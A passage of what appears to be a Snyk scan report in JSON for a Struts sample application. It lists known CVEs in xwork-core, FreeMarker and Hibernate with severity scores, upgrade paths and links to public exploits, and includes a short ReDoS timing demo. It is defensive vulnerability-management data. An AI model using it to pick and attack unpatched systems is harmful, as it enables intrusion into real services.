allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", - "epssDetails": { - "percentile": "0.77304", - "probability": "0.00531", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4433" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.724000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-21T01:33:07Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-06-21T01:33:07Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:52.478661Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29", - "org.apache.struts.xwork:xwork-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Alvaro Munoz" - ], - "semver": { - "vulnerable": [ - "[2.2.1,2.3.28.1]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-036.html", - "title": "Apache Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:55.264787Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:49.390018Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:55.264787Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n", - "epssDetails": { - "percentile": "0.94726", - "probability": "0.09408", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4461" - ], - "CWE": [ - "CWE-264" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.738000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-11-14T07:48:03.440000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-11-14T07:48:03.440000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:55.264787Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29", - "org.apache.struts.xwork:xwork-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", - "title": "Regular Expression Denial of Service (ReDoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.3.20, 2.3.29)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.316157Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", - "epssDetails": { - "percentile": "0.99401", - "probability": "0.95900", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4465" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.751000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-20T07:45:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-06-20T07:45:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:51.243501Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29", - "org.apache.struts.xwork:xwork-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", - "title": "Command Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.20.2)", - "[2.3.24, 2.3.24.2)", - "[2.3.28, 2.3.28.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.20.2", - "2.3.24.2", - "2.3.28.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", - "title": "NVD" - }, - { - "url": "https://www.exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:02.554699Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", - "epssDetails": { - "percentile": "0.99987", - "probability": "0.97524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3081" - ], - "CWE": [ - "CWE-77" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2019-07-16T11:38:49.236917Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-04-22T04:32:51Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-04-22T04:32:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:20.892839Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3", - "org.apache.struts.xwork:xwork-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", - "title": "Insecure Defaults", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "Jasper Rosenberg" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.20.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.20.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/WW-4486", - "title": "Jira Issue" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831", - "title": "NVD" - }, - { - "url": "https://struts.apache.org/docs/s2-024.html", - "title": "Struts Security Advisory" - }, - { - "url": "http://struts.apache.org/docs/s2-024.html", - "title": "Vulnerability Summary" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:26.053752Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:02.093877Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:26.053752Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n", - "epssDetails": { - "percentile": "0.85294", - "probability": "0.01190", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-1831" - ], - "CWE": [ - "CWE-453" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2019-10-27T13:46:24.359760Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-05-11T16:51:55Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2015-05-11T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:26.053752Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.1", - "org.apache.struts.xwork:xwork-core@2.3.20.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Huawei PSIRT" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.3.24.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.24.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf", - "title": "GitHub Commit" - }, - { - "url": "https://struts.apache.org/docs/s2-027.html", - "title": "Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:51.429176Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:53.537810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:51.429176Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n## Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n", - "epssDetails": { - "percentile": "0.86301", - "probability": "0.01352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3090" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-ggmp-fxfg-277r" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2023-08-01T07:46:40.919855Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-14T03:15:07Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2023-08-01T09:22:02.765398Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:51.429176Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.1", - "org.apache.struts.xwork:xwork-core@2.3.24.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGFREEMARKER-1076795", - "title": "Server-side Template Injection (SSTI)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Ackcent" - ], - "semver": { - "vulnerable": [ - "[,2.3.30)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.30" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.freemarker:freemarker", - "references": [ - { - "url": "https://github.com/apache/freemarker/pull/62", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/FREEMARKER-124", - "title": "Jira Issue" - }, - { - "url": "https://ackcent.com/in-depth-freemarker-template-injection/", - "title": "Research Blogpost" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:29.670906Z" - } - ], - "description": "## Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n## Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n## References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.freemarker:freemarker", - "proprietary": false, - "creationTime": "2021-02-19T11:41:17.941362Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-09T11:33:30Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.freemarker", - "artifactId": "freemarker" - }, - "publicationTime": "2021-02-19T15:54:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T14:04:29.670906Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.freemarker:freemarker@2.3.19" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.25", - "org.freemarker:freemarker@2.3.30" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.freemarker:freemarker", - "version": "2.3.19" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - 